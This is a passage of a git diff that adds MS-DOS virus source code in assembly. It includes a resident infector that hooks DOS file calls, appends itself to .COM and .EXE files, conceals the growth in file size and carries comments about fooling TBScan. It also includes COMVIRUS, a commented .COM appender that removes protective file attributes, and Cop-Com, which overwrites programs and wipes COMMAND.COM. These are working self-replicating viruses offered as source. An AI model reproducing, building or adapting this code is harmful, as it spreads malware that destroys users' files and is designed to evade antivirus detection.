+ mov es, bx + cmp bx, es:[16h] ; Ensure that dos is calling + jne fcbexit + + call getdta ; Get address of fcb + lodsb ; Check if extended + cmp al, 0FFh + jne noext + add si, 7 +noext: + mov bx, si + add si, 8 ; Check extension + lodsw + push ax + + add si, 0Ch ; Check for infection + lodsb + and al, 1Fh + cmp al, 03h + pop ax + pushf + add si, 5 + + cmp ax, 'OC' + je fcbcom + cmp ax, 'XE' + je fcbexe + popf + jmp fcbexit + +fcbcom: + ; Check for infection + popf + jne fcbcomni + sub word ptr [si], bytesize + jmp fcbexit +fcbcomni: + in al, 41h ; Get timer (rnd) + test al, 03h ; 25% infection + jne fcbexit + call cvtasciz ; Convert to asciz + mov ax, 'C.' ; Append exetnsion + stosw + mov ax, 'MO' + stosw + jmp fcbinfect + +fcbexe: + ; Check for infection + popf + jne fcbexeni + sub word ptr [si], bytesize + jmp fcbexit +fcbexeni: + in al, 41h ; Get timer (rnd) + test al, 03h ; 25% infection + jne fcbexit + call cvtasciz + mov ax, 'E.' + stosw + mov ax, 'EX' + stosw + +fcbinfect: + xor al, al + stosb + mov dx, offset last + push cs + pop ds + call infect + +fcbexit: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf 2 + + +cvtasciz proc + push cs ; Convert to asciz + pop es + mov si, bx + mov di, offset last + mov cx, 8 +loop3: lodsb + cmp al, ' ' + je loopx + stosb + loop loop3 +loopx: ret +cvtasciz endp + + +infect proc +; Called on load and execute + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + + mov ax, 3D82h ; Open victim + call dos + jc exitinfect + xchg ax, bx + + mov ax, 5700h ; Save file date/time + call dos + push dx + push cx + + mov ah, 3Fh ; Read first bytes + push cs + pop ds + lea dx, orgip + mov cx, 2 + call dos + xor orgip, 4523h ; Check if .exe file + cmp orgip, 'MZ' xor 4523h ; TBScan fooled again... + je infectexe + cmp orgip, 'ZM' xor 4523h + je infectexe + xor orgip, 4523h + jmp infectcom + +infectdone: + pop cx ; Restore date/time of file + pop dx + mov ax, 5701h + call dos + + mov ah, 3Eh ; Close file + call dos +exitinfect: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + ret +infect endp + +infectexe: + ; Read header from .exe file + mov ah, 3Fh + lea dx, last ; Use memory above virus + mov cx, 16h + call dos + + ; Calculate address of entrypoint + mov ax, word ptr last[entryseg] ; Get entry cs value + add ax, word ptr last[headsize] ; Get header size + mov cx, 10h ; Convert to bytes + mul cx + add ax, word ptr last[entryofs] ; add ip offset + adc dx, 00 + + ; Seek to entrypoint + mov cx, dx + xchg dx, ax + mov ax, 4200h + call dos + + ; Check if already infected + mov ah, 3Fh ; Read bytes at entry + mov cx, 4h + lea dx, orgip + mov si, dx + call dos + + lodsw ; Compare entry to virus + cmp ax, word ptr start + jne exenotinf + lodsw + cmp ax, word ptr start[2] + je infectdone + + +exenotinf: + ; Mark infection + pop ax ; Get time stamp + and al, 0E0h ; Mask seconds + or al, 003h ; Set seconds to 6 + push ax + + ; Infect file + lea si, last[entryofs] ; Save program information + lodsw + mov orgip, ax + lodsw + mov orgcs, ax + mov cs:com, 0 ; This is .exe + + ; Calculate virus entry + mov ax, 4202h ; Seek to eof + xor cx, cx + cwd + call dos + + xchg ax, dx ; eof pos in ax:dx + mov cl, 12 + shl ax, cl + mov word ptr last[entryseg], ax + xchg ax, dx + xor dx, dx + mov cx, 10h ; Convert eof pos to paras + div cx + sub ax, word ptr last[headsize] ; Calculate entry for virus + add word ptr last[entryseg], ax ; Save in header + mov word ptr last[entryofs], dx + + ; Recalculate size + mov ax, word ptr last[lastsize] + add ax, bytesize + cwd + mov cx, 200h + div cx + mov word ptr last[lastsize], dx + add word ptr last[pages], ax + + + mov ah, 3Fh ; Append virus + mov dx, 100h + mov cx, bytesize + inc ah ; TB-Moron(tm) + push ax + call dos + + ; Save modified exe-header + mov ax, 4200h ; Seek to header + xor cx, cx + mov dx, 2 + call dos + + pop ax + lea dx, last ; Write header + mov cx, 16h + call dos + + jmp infectdone + + +infectcom: + ; Installation check + call ichkcom + jnc comnotinf + jmp infectdone + +comnotinf: + + ; Mark infection + pop ax ; Get time stamp + and al, 0E0h ; Mask seconds + or al, 003h ; Set seconds to 6 + push ax + + mov com, 0FFh + + ; Seek to eof + mov ax, 4202h + xor cx, cx + cwd + call dos + + ; Create jump opcode + sub ax, 3 + mov word ptr last, ax + + ; Append virus + mov ah, 3Fh + mov cx, bytesize + mov dx, 100h + inc ah ; TB... + push ax + call dos + + ; Write jump to beginning of file + mov ax, 4200h + xor cx, cx + cwd + call dos + pop ax ; TB... + mov cx, 3 + lea dx, jumpop + call dos + + jmp infectdone + + + +findhandle: + pushf + push ax + push bx + push cx + push si + push di + push ds + push es + + call getdta ; dta to es:si and ds:si + mov di, si + + mov al, si[16h] ; Get seconds + and al, 1Fh + cmp al, 3 + pushf + + add di, 1Eh ; di to name + mov cx, 9 + mov al, '.' + repne scasb ; scan for extension + xchg si, di + lodsw + cmp ax, 'OC' ; check if com? + je hdlcom + cmp ax, 'XE' + je hdlexe + popf + jmp hdlexit + +hdlcom: +hdlexe: + popf + jne hdlexit + sub word ptr di[1Ah], bytesize + sbb word ptr di[1Ch], 0 + +hdlexit: + pop es + pop ds + pop di + pop si + pop cx + pop bx + pop ax + popf + retf 2 + + + + + + +ichkcom proc +; Checks if com-file with handle in bx is infected + + mov ax, 4200h ; Seek to beginning + xor cx, cx + cwd + call dos + + push ds + + mov ah, 3Fh ; Read first bytes + mov cl, 3 + mov dx, offset orgip + call dos + + cmp byte ptr orgip, 0E9h ; Check if jump + jne icnotinf + + mov ax, 4201h ; Seek to entry point + xor cx, cx + mov dx, word ptr orgip[1] + call dos + + mov cl, 4 + call readtolast ; Get entry point + cmp word ptr last, 0E81Eh + jne icnotinf + cmp word ptr last[2], 00007h + jne icnotinf + + pop ds + stc ; Return with carry + ret +icnotinf: + pop ds + clc ; Not infected + ret +ichkcom endp + + + +dos proc + pushf + call dword ptr cs:org21o + ret +dos endp + + +getdta proc + mov ah, 2Fh ; Get dta + call dos + push es ; ds:si to dta + pop ds + mov si, bx + ret +getdta endp + + +readtolast proc + mov ah, 3Fh + push cs + pop ds + mov dx, offset last + call dos + ret +readtolast endp + + + +jumpop db 0E9h +last: + +exehead struc + lastsize dw ? + pages dw ? + tblesize dw ? + headsize dw ? + minalloc dw ? + maxalloc dw ? + stackseg dw ? + stackofs dw ? + checksum dw ? + entryofs dw ? + entryseg dw ? +exehead ends + +end start +================================================================================ diff --git a/MSDOS/Virus.MSDOS.Unknown.compres.asm b/MSDOS/Virus.MSDOS.Unknown.compres.asm new file mode 100644 index 00000000..e622cf44 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.compres.asm @@ -0,0 +1,224 @@ +code segment + assume cs:code, ds:code, es:code + org 100h +prog: + jmp main + +tbl dw 256 dup (0) +asc db 256 dup (0) +cod db 256 dup (0) +len db 256 dup (0) +dat db 0,10,16,9,64,8,64,8,0,7 +fn1 db 'afd.com',0 +fn2 db 'sup.com',0 +fn3 db 'e1.com',0 + +main: + + call read + call build + call uha + call good + call write + + mov al,00h + mov ah,4ch + int 21h + +good proc near + mov ax,cs + mov ds,ax + mov si,offset asc + mov di,152 + mov cx,256 + rep movsb + + mov dx,offset fn3 + mov al,00h + mov ah,3dh + int 21h + jc ssr + mov bx,ax + mov ax,es + mov ds,ax + sub dx,dx + mov cx,152 + mov ah,3fh + int 21h + jc ssr + mov ah,3eh + int 21h + mov ax,cs + mov ds,ax +ssr: ret +good endp + +uha proc near + mov ax,cs + add ax,1000h + mov ds,ax + add ax,1000h + mov es,ax + mov bx,4fffh + mov di,bx + mov ch,0 + sub bp,bp +lu10: sub ax,ax + mov al,[bx] + mov si,ax + mov al,cs:cod[si] + mov dl,cs:len[si] + mov cl,dl + cmp dl,7 + jne lu20 + inc ah +lu20: sub cl,ch + shl ax,cl + or bp,ax + add ch,16 + sub ch,dl + mov cl,8 +lu30: cmp ch,cl + jc lu40 + mov ax,bp + shl bp,cl + mov es:[di],ah + dec di + sub ch,cl + jmp short lu30 +lu40: dec bx + cmp bx,0ffffh + jne lu10 + mov ax,bp + mov es:[di],ah + ret +uha endp + +fill proc near + sub si,si + mov cx,0100h +lf10: mov ax,si + mov cs:asc[si],al + inc si + loop lf10 + sub bx,bx + mov cx,5000h +lf20: mov al,[bx] + mov si,ax + shl si,1 + inc cs:tbl[si] + inc bx + loop lf20 + ret +fill endp + +pause proc near + push ax + mov ah,01h + int 21h + pop ax + ret +pause endp + +sort proc near + mov cx,00ffh +l10: mov di,cx + mov bx,cx + shl bx,1 + add bx,offset tbl + sub ax,ax +l20: mov si,ax + shl si,1 + mov dx,tbl[si] + cmp dx,[bx] + jnc l30 + xchg dx,[bx] + xchg dx,tbl[si] + shr si,1 + mov dl,asc[si] + xchg dl,asc[di] + xchg dl,asc[si] +l30: inc ax + cmp ax,cx + jc l20 + loop l10 + ret +sort endp + +make proc near + mov cx,16 + mov bx,offset dat + sub si,si + sub ax,ax +lm10: mov al,asc[si] + mov di,ax + mov dx,si + add dl,[bx] + mov cod[di],dl + mov dl,[bx+1] + mov len[di],dl + inc si + cmp si,cx + jnz lm10 + inc bx + inc bx + shl cx,1 + cmp cx,512 + jnz lm10 + ret +make endp + +build proc near + call fill + mov ax,cs + mov ds,ax + call sort + call make + ret +build endp + +write proc near + mov dx,offset fn2 + mov al,02h + mov ah,3dh + int 21h + jc sw + mov bx,ax + mov ax,es + mov ds,ax + sub dx,dx + mov cx,5000h + mov ah,40h + int 21h + jc sw + mov ah,3eh + int 21h +sw: ret +write endp + +read proc near + mov dx,offset fn1 + mov al,00h + mov ah,3dh + int 21h + jc sr + mov bx,ax + mov ax,ds + add ax,1000h + mov ds,ax + sub dx,dx + mov cx,5000h + mov ah,3fh + int 21h + jc sr + mov ah,3eh + int 21h +sr: ret +read endp + + +last label byte +code ends + end prog + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.comvirus.asm b/MSDOS/Virus.MSDOS.Unknown.comvirus.asm new file mode 100644 index 00000000..e50cc167 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.comvirus.asm @@ -0,0 +1,458 @@ +title COMVIRUS +subttl By Drew Eckhardt +subttl Latest revision: 4-28-1991 + +;The author of this virus intends it to be used for educational +;purposes only, and assumes no responsibilities for its release, +;dammages resulting from its use, including but not limited to +;equipment dammage or data loss. + +;By assembling or examining this program, The user agrees to accept all +;responsibility for this programs use, or any portions of the code +;or concepts contained within. The user also agrees to not publicly release +;this virus, and to exercise necessary precautions to prevent its escape. +;The user accepts all responsibility arising from his actions. + +;Don't come crying to me if your hard disk gets infected, +;as THERE IS NO ANTIDOTE. HAHAHAH. + + +;Revision history: +;4-13: initial bug-free release, size=424 bytes with carrier + +;4-15: added no date change support, size=438 bytes with carrier + +;4-16: minor documentation changes, size=438 bytes with carrier, +; NO CODE CHANGE from 4-15 revision + +;4-21: fixed missing hex h suffixs, made MASM friendly, +; fixed incorrect assume statement (assume statements are ignored +; by A86) enabled hard/floppy infection based on floppy_only status +; size=438 bytes IF floppy_only, 424 bytes if not, with carrier. +; minimum virus length = 419 bytes + +;4-23: added control over how many programs are infected per run, +; switched method of infection, from copying to DTA then writing +; to disk to straight write to disk from memory. +; size=412 bytes IF floppy_only, 398 bytes if not, with carrier. +; minimum virus length = 393 bytes + +;4-28: used set DTA instead of default DTA/copy command line +; buffer, which had been used based on incorrect assumption +; eliminated calls to get time/date, get attribs +; by using information from find first/find next functions 4eh/4fh +; made warning optional for reduced space if desired. Also +; changed mov reg16, bp add reg16, constant to shorter LEA instruction. +; size=354 bytes IF floppy_only, warning on W/carrier +; 340 bytes IF w/warning & carrier program +; 286 bytes w/o warning, in program +; minimum virus length = 281 bytes for virus itself + +;4-28pm: instead of near CALL-pop sequences everywhere, switched to +; a single CALL near ptr Reference_Point, putting the result into +; si now that (until the end) string mode addressing is not used. +; Changed places where a register (used as an index) +; was being loaded THEN added to a single LEA isntruction +; size = 340 bytes if floppy_only, warning on w/carrier +; size = 326 bytes if w/warning & carrier +; size = 272 w/o warning +; minimum virus length = 267 bytes for the virus itself + +;4-28pm2: Eliminated unecessary flush buffers call. +; size = 336 bytes if floppy_only w/carrier +; size = 322 bytes w/warning & carrier +; size = 268 w/o warning +; minimum virus length = 263 bytes for virus itself + +;4-30: restored 5 bytes of original code at CS:0100 +; before infecting other programs, allowing the +; original code field to be modified so one disk write could be +; used instead of two +; minor documentation revisions - corrected incorrect +; opcodes in documentation +; size = 326 bytes if floppy_only w/carrier +; size = 312 bytes w/warning & carrier program +; size = 258 bytes w/carrier program +; Minimum virus length = 253 bytes for the virus itself + +;NOTE: The program is currently "set up" for A86 assembly with all +;conditional assembly symbols. #IF and #ENDIF should be replaced with +;MASM IFDEF and ENDIF directives for propper operation. +;Also, instead of using EQUates to define control symbols, the /D +;option or DEFINE could be used..... + + +;COMVIRUS.ASM must be assembled into a .COM file inorder to function +;properly. For convieniece, I recommend an assembler like A86 that will +;assemble to a .COM file without having to go through LINK and EXE2BIN + +;As is, it will infect .COM files located on the current disk. +;ONLY if it is a floppy disk, ONLY in the root directory. + +;This is a .COM infector virus, which, does nothing other than print a +;warning message, and spread to all files on the default disk IFF it is +;a floppy disk, in the root directory. + +;Theory: +;This is a non - overwriting virus. I took special precautions to preserve +;all functionality of the original program, including command line, parsed FCB, +;and segment register preservation. This makes the virus harder to detect. + +;The .COM file is a memory image - with no relocation table. Thus, it +;is an easy target for a virus such as this. + +;Infected file format +;jmp near ptr xxxx +;cli cli ;ID bytes +;ORIGINAL program code, sans 5 bytes +;5 bytes ORIGINAL program code +;VIRUS + +;This format makes infection VERY simple. We merely check for our signature +;(in this case cli cli (fa fa) - instructions that no programmer in his +;right mind would use - loading the original five bytes in the process. +;These original bytes are written to the end of the program, then +;A jump to where the virus is. + +;While infection is easy, this method presents some coding problems, as the +;virus does not know where in memory it is. Therefor, When we want to access +;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the +;stack which is then popped. Addresses are then calculated relative to this +;via LEA + +;To run the program as normal, command line is restored, registers restored, +;And original code copied onto the first five bytes of the program. + + +;Program control symbols defined here +floppy_only equ 1 +infect_per_run equ 1 ;number of programs infected per run +warn_user equ 1 + +_TEXT segment byte 'CODE' + assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT + org 100h + +Start: jmp infect; + +;This is our signature + cli + cli + +;Original code is the data field where we store the original program code +;which will replace our signature and jmp to infect + +Original_Code: int 20h ;five bytes that simply terminate + nop ;the program + nop + nop + + + +;Data for the virus. In a destructive virus, you would want to encrypt +;any strings using a simple one's complement (not) operation so as to +;thwart detection via text search utilities. Since we want detection to +;be easy, this un-encrypted form is fine. + + +Start_Virus: +#IF warn_user + Warning db "This file infected with COMVIRUS 1.0",10,13,'$' +#ENDIF + +;VirusMask is simply an ASCIIZ terminated string of the files we wish to +;infect. + + VirusMask db '*.COM', 0 +Infect: + push ax ;on entry to a .COM program, STACK: + ;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp + ;for the two FCB's in here. Save + ;'em + + ;I use special trickery to find location of data. Since + ;NEAR calls/jmps are RELATIVE, call near ptr find_warn is + ;translated to e8 0000 - which will simply place the location + ;of Reference onto the stack. Our data can be found relative to + ;this point. + + call near ptr Reference ;All data is reference realative to + ;Reference + + +Reference: pop bx ;which is placed into bx for LEA + ;instructions + ;bx now contains the REAL address of + ;Reference + ;si points to real address of original + ;code field + lea si, [bx-(offset Reference - offset Original_Code)] + mov di, 0100h ;original code is at 100h + mov cx, 5 ;5 bytes + cld ;from start of buffer + rep movsb ;do it + + mov si, bx ;since BX is used in handle + ;based DOS calls, for the remainder + ;of the virus, si will contain the + ;actual address of reference + +#IF warn_user + + ;Always calculate the address of data relative to known Reference + ;Point + lea dx, [si-(offset Reference - offset Warning)] + mov ah,9h ;DO dos call, DS:DX pointing + int 21h ;to $ terminated string + + ;We want to make sure that the user gets the message + +WaitForKey: + mov ah, 0bh ;we will wait for a keypress + int 21h ;signifying the user has + or al, al ;seen the message. + jz WaitForKey + +#ENDIF + +#IF FLOPPY_ONLY + + ;Since this is a simple demonstration virus, we will only infect + ;.COM files on the default drive IFF it is a floppy disk.... + ;So, we will get information about the disk drive. + + + push ds ;ds:bx returns a byte to + ;media descriptor + + mov ah, 1bh ;get disk information STACK + int 21h ;DOIT ax (drive ID's) + cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp + + pop ds ;restore ds STACK + jne Floppy ;if it was hard.... ax <--sp + jmp near ptr done ;we're nice guys and are done + +Floppy: ;Since it was floppy, we can go on with the infection! +#ENDIF + ;The default DTA, as is will give us problems. The designers of + ;MickeySoft DOS decided to put default DTA at ofset 128 in + ;the PSP. PROBLEM: This is also where the user's precious command + ;line is, and we MUST remain undectected. SO.... we allocate a + ;DTA buffer on the stack. 43 bytes are needed, 44 will do. + + sub sp, 44 ;allocate space for findfirst/findnext DTA + mov bp, sp ;set up bp as a reference to this area + + ;Set the DTA + mov dx, bp ;point DS:DX to our area + mov ah, 1ah ;set DTA + int 21h + + ;Set up pointers to data in DTA + dta equ word ptr [bp] + file_name equ word ptr [bp+1eh] + attributes equ byte ptr [bp+15h] + time_stamp equ word ptr [bp+16h] + date_stamp equ word ptr [bp+18h] + file_size equ dword ptr [bp+1ah] + + ;We dynamically allocate a variable to store the number of programs STACK + ;The virus has infected. FCB drives + ; bp--> 44 byte DTA + infected_count equ byte ptr[bp-2]; Infected_Count + xor ax, ax ;zero variable, sp--> buffer (6 bytes) + push ax ;allocate it on the stack + sub sp, 6 ;allocate small buffer + + ;Now, we begin looking for files to infect. + lea dx, [si - (offset Reference - offset VirusMask)] + ;DS:DX points to the search string STACK + mov ah, 4eh ;find first matching directory entry FCB drives (word) + mov cx, 111b ;only default directory, FILES + ;hidden, system and normal + int 21h ;doit bp--> 44 byte DTA buffer + ; infected count (word) + jnc Research ;carry is clear when a file was sp--> 6 byte buffer + jmp nofile ;found. + + +ReSearch: +;All handle based DOS calls take a pointer to an ASCIIZ file name in ds:dx + lea dx, file_name + +;Since this is a virus, we want to infect files that can't be touched by +;DOS commands, this means readonly, system, and hidden files are at our +;mercy. To do this, we rely on the findfrst/next attributes and other data +;to restore the attribute byte to the original settings. get/SET can fix +;them to be suitable + mov cl, attributes + and cl, 11100000b ;not readonly, system, or hidden STACK + ; FCB drives + mov ax, 4301h ;set attributes bp--> buffer (44 bytes) + int 21h ; buffer (6 bytes) + ; sp--> infected_count + jnc NoError ;check for error + jmp Restore_Flags +NoError: + mov ax, 3d02h ;now, open file using handle, + ;read/write access + int 21h ; + jnc NoError2 ;IF there was an error, we are done + jmp Restore_Flags ;But we don't need to commit or close + +NoError2: + mov bx, ax ;The handle was returned in ACC. + ;Howwever, all handle based DOS + ;calls expect it in BX + + +;We don't want to infect the program more than once, so we will +;check to see if it is infected. + + + mov ax, 4200h ;seek relative to start of file + ; bx contains handle from open operation + xor cx,cx ;cx:dx is file pointer + xor dx, dx ; + int 21h ;DOIT + +;Now, we will read in enough data to see if we have our virus signature. + mov ah, 3fh ;read data + lea dx, [si-(offset reference-offset original_code)] + ;into original_code buffer + mov cx, 5 ;5h bytes + ; bx contains handle from last operation + int 21h + + cmp word ptr [si-(offset reference-offset original_code)+3], 0fafah + jne GoApe ;if we aren't already infected, + jmp Error ;go for it + +GoApe: +;Since it is safe to infect, we will + mov ax, 4202h ;seek end of file + xor cx, cx + xor dx, dx + int 21h + + or dx, dx ;check for valid .COM format + jz Less_Than_64K + jmp Error + +Less_Than_64K: + +;Now, we must calculate WHERE the jump will be to. Let's examine the program +;Structure: +;jmp near ptr xxxx +;Cli Cli }These add up to the original length +;Orignal code sans 5 bytes + +;Original_Code (5 bytes) }The length of all virus data +;Other virus data is equal to the difference in +;Infect the addresses of Infect and Original_Code + +;End_Virus + + +;Thus, the jump must jump TO (offset Infect- offset Original_Code + Original_Length + origin) +;However, in the 80x86, NEAR jumps are calculated as an offset from the position +;of the next statement to execute (because of fetch/execute cycle operation). + +;Since jmp near ptr xxxx takes 3 bytes, the next instruction is THREE bytes from +;The 0E9h jmp near instruction, so xxxx will be (offset Infect-Offset Original_Code +;+Original_Length-3); + + ;Since AX already contains the original length, we will merely add + ;Space for the virus data, and take care of the three bytes + ;of code generated by the jmp near instruction. + + add ax, (offset Infect - Offset Original_Code -3) + + ;calculate jump address + mov byte ptr [bp-8], 0e9h ;jmp near instruction + mov word ptr [bp-7], ax ;offset for near jmp + mov word ptr [bp-5], 0fafah ;cli cli + + mov ax, 4200h ;seek begining of file + xor cx, cx + mov dx, cx + int 21h + + mov ah, 40h ;write patched code + mov cx, 5 ;5 bytes of code + lea dx, [bp-8] ;our buffer + int 21h + + mov ax, 4202h ;seek EOF + xor cx, cx + xor dx, dx + int 21h + + + lea dx, [si - (offset Reference - offset Original_Code)]; set start + mov cx, (offset End_Virus - offset Original_Code) ;set length + mov ah, 40h ;append virus to file + int 21h ;doit + + inc infected_Count ;bump up the number of programs infected + +Error: mov dx,date_stamp ;restore date + mov cx,time_stamp ;restore time + mov ax, 5701h ;set them + int 21h + + mov ah, 3eh ;close file + int 21h + +Restore_Flags: + xor ch, ch ;zero hi byte flags + mov cl,attributes ;restore flags + lea dx, file_name ;ds:dx points to ASCIIZ string + ;in the buffer, offset 1eh contains + ;the file name + mov ax, 4301h ;get/SET flags + int 21h ;Doit + +DoAgain:;See if we're done infecting + cmp infected_count, infect_per_run + jae NoFile ;if we're done, same as no new file + + + mov ah, 4fh ;find next + int 21h + + jc NoFile ;if carry is clear, DOIT again! + jmp ReSearch + +;Since we have no more files, we will restore things to normal. +NoFile: + mov dx, 80h ;reset default dta at DS:80h + mov ah, 1ah ;set DTA + int 21h + + add sp, 52 ;deallocate buffers and infected_count + + + +;Put original code of program BEFORE it was infected back in place! + + +Done: + pop ax ;restore ax + + + ;FUNKY code! In the 80x86, all NEAR or SHORT jmp opcodes take + ;a RELATIVE address...... BUT a retn opcode pops a near absolute + ;address of the stack - saves us the trouble of some calculating + ;relative to here, and the trouble of a self-modifying + ;far absolute jmp! (5 bytes) + + mov bx, 0100h + push bx + ret ;easiest jump to cs:100 + +End_Virus: +_TEXT ends +end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.copcom.asm b/MSDOS/Virus.MSDOS.Unknown.copcom.asm new file mode 100644 index 00000000..deb130ca --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.copcom.asm @@ -0,0 +1,103 @@ +; +; Cop-Com Virus +; + Org 100h + +Main: Xor Cx,Cx +On1: Call CritErr + Inc Cx + Cmp Cx,10 + Jb Infect + Push Cs + Pop Ds + Mov Ah,3ch + Lea Dx,Command + Xor Cx,Cx + Int 21h + Mov Ah,9 + Lea Dx,Msg + Int 21h + Jmp ShutDown +; +; Infection procedure +; +Infect: Push Cx + Mov Ah,4eh + Push Cs + Pop Ds +NextFile: Xor Cx,Cx + Lea Dx,COMFILE + Int 21h + Jc Einde + Mov Ax,Cs:[96h] + And Ax,1fh + Cmp Ax,1fh + Jne Do_It + Mov Ah,4fh + Jmp NextFile +Do_It: Mov Ax,3d02h + Mov Dx,9eh + Int 21h + Xchg Ax,Bx + Mov Ax,5700h + Int 21h + Push Cx + Push Dx + Mov Ah,40h + Mov Dx,100h + Mov Cx,VirLen + Int 21h + Pop Dx + Pop Cx + Or Cx,1fh + Mov Ax,5701h + Int 21h + Mov Ah,3eh + Int 21h +Einde: Pop Cx + Jmp On1 + +; +; Routine for calling the critical error handler +; +CritErr: Mov Ah,19h + Int 21h + Xor Dx,Dx + Mov Ds,Dx + Mov Ah,3ah + Pushf + Call Dword ptr Ds:[90h] + Cmp Al,2 + Jae ShutDown + Ret + + +; +; Terminate routine +; +ShutDown: Mov Ax,4c00h + Int 21h + + +; +; Activate message +; +Msg Db 13,10,'Program halted by Cop-Com' + Db 13,10,'Unauthorized program on your system' + Db 13,10,'Consult Local dealer for support' + Db 13,10,'$' + + Db '> (C) Business Software Alliance <' + +; +; Filespecs +; +Command Db 'C:\COMMAND.COM',0 +COMFILE Db '*.COM',0 + +VirLen Equ $-Main + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪